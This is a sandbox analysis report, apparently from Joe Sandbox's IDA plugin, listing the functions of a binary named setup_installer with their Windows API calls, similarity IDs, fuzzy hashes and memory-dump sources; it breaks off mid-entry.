                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: d17c0ca2ced44424d2f780bba9c87b2715d3c144875a3533d3fe3f075a9b9a59
                                        • Instruction ID: 9af5a8c9999b4a2f38037104a0b4c214d35f1fab808fcbcdec8469b5e69bc05e
                                        • Opcode Fuzzy Hash: d17c0ca2ced44424d2f780bba9c87b2715d3c144875a3533d3fe3f075a9b9a59
                                        • Instruction Fuzzy Hash: 6AD05E7021220146EF489F20C949796B2D47F50613F58857AF853CAA91FB2CC6948648
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00410F60), ref: 004137A1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 98dbc30ccae0949d29e9745611a8297d10c42e2999911135f846b2ac1735627b
                                        • Instruction ID: 26fcc7a4b7f8066c4caec3dd40339106bc2c663ef6f5d49925e7066ee81a0dd4
                                        • Opcode Fuzzy Hash: 98dbc30ccae0949d29e9745611a8297d10c42e2999911135f846b2ac1735627b
                                        • Instruction Fuzzy Hash: 29B012F07A128035FE6807214D0FFFB5A509348B5BF0081B8B715D80C4E7D05440511C
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000), ref: 00413811
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 92735ca84e52f538702ecb6ec21f91555a91a8bffad8afd78f3bc7818ee4d028
                                        • Instruction ID: e03e2c2186c6dbf214b011caf4efa4a81c4bf758aef5a93a91a1cadcfefd29ca
                                        • Opcode Fuzzy Hash: 92735ca84e52f538702ecb6ec21f91555a91a8bffad8afd78f3bc7818ee4d028
                                        • Instruction Fuzzy Hash: 53C08CE1A4D2809FDF0213108C407703F308B8B300F0A00C1E9045B092C2000808C722
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: 4e4b97c8df32ee9fc110583acaac8f3580eb89f53c0fc54fed573577a25b04ae
                                        • Instruction ID: e9a776f8b561c7906f99c97af60905b4207f6b767d51b374da93a018ac2131ba
                                        • Opcode Fuzzy Hash: 4e4b97c8df32ee9fc110583acaac8f3580eb89f53c0fc54fed573577a25b04ae
                                        • Instruction Fuzzy Hash: 3FB012F012114012EE1C17382D2819730407640A47BC08478B402C0120F719C114504E
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: ec48c67d9d884d5c2e1c8e50903b5e665513c9d58559f81f173c0722ca0cd9cf
                                        • Instruction ID: e1834bf87b784a365167bfedfb21307e6a78aa9792587d0fbed25970968ed474
                                        • Opcode Fuzzy Hash: ec48c67d9d884d5c2e1c8e50903b5e665513c9d58559f81f173c0722ca0cd9cf
                                        • Instruction Fuzzy Hash: C6B012E8A101C012DA040B342C081933062B6D0507BC4C4B5A40180124FB28D114604D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 08ada9012d3aa8b37d6d1a895f5f94b9464adf61227ada9af42ee5a2db097504
                                        • Instruction ID: 12031c54dde89f87e40f0455a88b40bcc2ec3c50dd90033726b53ba6ce8cab4c
                                        • Opcode Fuzzy Hash: 08ada9012d3aa8b37d6d1a895f5f94b9464adf61227ada9af42ee5a2db097504
                                        • Instruction Fuzzy Hash: 2DB012B590000197CA046BA6940C596F767F698252335C195F50286110CB34C5404704
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00410F00), ref: 004137BC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: c36a5560efd41710e5581d1eccf0ebd167bcd73a9656c6fea769c839155dd278
                                        • Instruction ID: ab9a27aee94bf2fca4435cde870002c3b791476ff69122d908e4da98a3939ee1
                                        • Opcode Fuzzy Hash: c36a5560efd41710e5581d1eccf0ebd167bcd73a9656c6fea769c839155dd278
                                        • Instruction Fuzzy Hash: D3B012B074130121FD3847100C05B772500A70CF02F20C0587111640C0C6549404450C
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0041382C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 2cf424f09b2a63611f94bf1ef2906656b3368afbdbde5470752f6eddb9b02e63
                                        • Instruction ID: 4548bb9808f7885787c00c4898e7365c481cb8737fbf7d0afeb7407147252edf
                                        • Opcode Fuzzy Hash: 2cf424f09b2a63611f94bf1ef2906656b3368afbdbde5470752f6eddb9b02e63
                                        • Instruction Fuzzy Hash: 5BA00278A8070476ED60A7306D4FFB63A25B78CF01F30C5947251690D0EAE460489A5C
                                        APIs
                                        • free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 08b37fb6211b880a57e7f7b25606ba6c70778568a1df338add4bdb7f5ff5f10b
                                        • Instruction ID: 051098a63fa4cf3000d2175153d9286f598448f5614b51fb0f0108fed467fd2d
                                        • Opcode Fuzzy Hash: 08b37fb6211b880a57e7f7b25606ba6c70778568a1df338add4bdb7f5ff5f10b
                                        • Instruction Fuzzy Hash: F6A00271005100EBCA051B60ED19499BB61EB89662B31C4A9F18740471CB318820BA45
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: c4c572d9f57696b8c0e6e1de3699c55fb71bdc43637c77fb16101d20eef8a5fa
                                        • Instruction ID: 7c1fef89f0bccb1a01165ba8deb7b600c8a857a7521b8ae7fdf9e2709f779900
                                        • Opcode Fuzzy Hash: c4c572d9f57696b8c0e6e1de3699c55fb71bdc43637c77fb16101d20eef8a5fa
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        • free.MSVCRT(?,?,?,00413148), ref: 00413781
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: f7127e7e40eaa2db84907b96d6c7057def2c4eed74b735c5d7bd95b468904d09
                                        • Instruction ID: 082e6f8f9fdc4bbf4c0095df6602c445876609eb90aa96d1f6ec716ecc535606
                                        • Opcode Fuzzy Hash: f7127e7e40eaa2db84907b96d6c7057def2c4eed74b735c5d7bd95b468904d09
                                        • Instruction Fuzzy Hash:
                                        APIs
                                          • Part of subcall function 00405FD6: GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
                                          • Part of subcall function 00405FD6: GetProcessAffinityMask.KERNEL32(00000000), ref: 00405FE2
                                        • GetSystemInfo.KERNEL32(?), ref: 0040600D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentInfoMaskSystem
                                        • String ID:
                                        • API String ID: 3251479945-0
                                        • Opcode ID: 9638cc95e3299b83821e6c84bee8aa3ccb8c6e68d8bff0197413b8266dbdf947
                                        • Instruction ID: a595d45d0e218688a76e62c7e93015bc085ee55c95d1e1a04d1298ad9275ef66
                                        • Opcode Fuzzy Hash: 9638cc95e3299b83821e6c84bee8aa3ccb8c6e68d8bff0197413b8266dbdf947
                                        • Instruction Fuzzy Hash: F0D01230A0120A97DF04EBE6D4469EFB7789E4424CF04407ED902F21D1EB78D5448B65
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040F313
                                          • Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60
                                        • memcpy.MSVCRT ref: 0040F705
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7A1
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7B5
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7C9
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7DD
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7F1
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F805
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F819
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F82D
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F841
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F855
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F869
                                          • Part of subcall function 0040E966: _CxxThrowException.MSVCRT(?,0041DDD8), ref: 0040E979
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$H_prologmemcpy
                                        • String ID: $!$@
                                        • API String ID: 3273695820-2517134481
                                        • Opcode ID: 009ab704528832d8b16fb1e058230fc7f2265cacff4db05c787c47a6afb7277e
                                        • Instruction ID: a27f184481075ffe3955191de69d9ea92fdf604195ce2ec282d718430c25bf8c
                                        • Opcode Fuzzy Hash: 009ab704528832d8b16fb1e058230fc7f2265cacff4db05c787c47a6afb7277e
                                        • Instruction Fuzzy Hash: A5127074A01249EFCF24DFA5C5819EDBBB1BF09304F10847EE845AB792C738A995CB58
                                        APIs
                                        • GetVersionExW.KERNEL32 ref: 004143F5
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00414418
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041441F
                                        • GetSystemDirectoryW.KERNEL32(?,00000106), ref: 00414445
                                        • lstrlenW.KERNEL32(?), ref: 00414466
                                        • lstrcatW.KERNEL32(?,.dll), ref: 004144D7
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,00000000), ref: 004144E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemVersionlstrcatlstrlen
                                        • String ID: .dll$SetDefaultDllDirectories$\$\$kernel32.dll
                                        • API String ID: 532070074-471922092
                                        • Opcode ID: ae18c3a299c0fc34f521af23ecae2155342ef2f81c69c2ab57d08f5bd9fad663
                                        • Instruction ID: d987fb0205f110b4e88cb17dd8f0118f17295e0edb0f928e64eab48f7225754e
                                        • Opcode Fuzzy Hash: ae18c3a299c0fc34f521af23ecae2155342ef2f81c69c2ab57d08f5bd9fad663
                                        • Instruction Fuzzy Hash: 46219E312443049BD7349B609C44BD777E8AB98710F10882EE68593290E77CD585CBA9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: 35e1d9353c972ffb1d5c621511119ceb4edb1679282bba52ecb09f52cd819193
                                        • Instruction ID: 51bef7657f4b217767cf2214e4817ef679418496c32ecdcb676d7bec614d087e
                                        • Opcode Fuzzy Hash: 35e1d9353c972ffb1d5c621511119ceb4edb1679282bba52ecb09f52cd819193
                                        • Instruction Fuzzy Hash: 12417575A00718ABE6105A11EC41AEB736CDE64758B11002AFC4BB7681EB38AEA486DD
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,FindFirstStreamW), ref: 00404C48
                                        • GetProcAddress.KERNEL32(00000000), ref: 00404C51
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,FindNextStreamW), ref: 00404C5E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00404C61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                        • API String ID: 1646373207-4044117955
                                        • Opcode ID: a0e0ffeeea9361e73f572bd643a1eadea7e86d774db87774120aa9dc83c52679
                                        • Instruction ID: b848578b948c886adf4ab909bcc43a8b23ab1992de3229df41bf613d256c2862
                                        • Opcode Fuzzy Hash: a0e0ffeeea9361e73f572bd643a1eadea7e86d774db87774120aa9dc83c52679
                                        • Instruction Fuzzy Hash: 08E012B1A45318BA960067B9AC848A7BA9CD9D93623154437A214E3250D6F95C458BD8
                                        APIs
                                          • Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EE59
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFB5
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFC9
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F00A
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F072
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$free
                                        • String ID:
                                        • API String ID: 3129652135-3916222277
                                        • Opcode ID: e26337be683b5af4c30aef131a22ba05f72600e83a284499b723228e6f86e7e5
                                        • Instruction ID: b719d39ac1e1c0dfc465c254aa8864d8cdc5b6410d67c82479710a15fcd5db0f
                                        • Opcode Fuzzy Hash: e26337be683b5af4c30aef131a22ba05f72600e83a284499b723228e6f86e7e5
                                        • Instruction Fuzzy Hash: 7F918271E00309ABCF14DFA5C4815AEBBB5AF49314F10847FE855BB382C738AA958B94
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040BA1D
                                          • Part of subcall function 0040B871: EnterCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B876
                                          • Part of subcall function 0040B871: LeaveCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B880
                                        • EnterCriticalSection.KERNEL32(?), ref: 0040BA4A
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040BA66
                                        • __aulldiv.LIBCMT ref: 0040BAB5
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040BB02
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$H_prologTextWindow__aulldiv
                                        • String ID:
                                        • API String ID: 729368748-0
                                        • Opcode ID: dae6ce3810544a55a0cadaf366efc3d68dae998be2ac9b3ae07b387af689c148
                                        • Instruction ID: cd95b3165d2d8f135bb25e3b680c2f95c897e520c5a9096d40279e617bd503f6
                                        • Opcode Fuzzy Hash: dae6ce3810544a55a0cadaf366efc3d68dae998be2ac9b3ae07b387af689c148
                                        • Instruction Fuzzy Hash: CB313075A00219AFCB11EFA5CC419EEBBB9FF48314F00442AF515B3691C739A955CFA8
                                        APIs
                                          • Part of subcall function 00418AC0: SetEvent.KERNEL32(?,00407A1F), ref: 00418AC3
                                        • GetDlgItem.USER32(?,00000064), ref: 0040B8AB
                                        • LoadIconW.USER32(00000000), ref: 0040B8C5
                                        • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040B8D6
                                        • SetTimer.USER32(?,00000003,00000064,00000000), ref: 0040B8E5
                                        • SetWindowTextW.USER32(?,?), ref: 0040B8F4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: EventIconItemLoadMessageSendTextTimerWindow
                                        • String ID:
                                        • API String ID: 2712766465-0
                                        • Opcode ID: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
                                        • Instruction ID: e294c04aeed814171d4adbec44afb40f75d5ab8e46fef825956d7cc37fe38289
                                        • Opcode Fuzzy Hash: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
                                        • Instruction Fuzzy Hash: D9011A30040B40AFE7215B21DD5ABA6BBA1FB05720F008A2DFAA7959F0C775B852CB48
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
                                        • Instruction ID: a37c9b6fd46fbe13aac1983c9063a21cde19e2a8279128ea102ca4b182acfc17
                                        • Opcode Fuzzy Hash: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
                                        • Instruction Fuzzy Hash: 9411E931740304A7D7104F15EC02FEA73A89B94714F15483EFC4ABA3C2E67AF9A0969D
                                        APIs
                                          • Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                        • SetLastError.KERNEL32(00000078), ref: 00404C8F
                                        • SetLastError.KERNEL32(00000000), ref: 00404C99
                                        • FindFirstStreamW.KERNELBASE(?,00000000,?,00000000), ref: 00404CAD
                                        • GetLastError.KERNEL32 ref: 00404CBA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
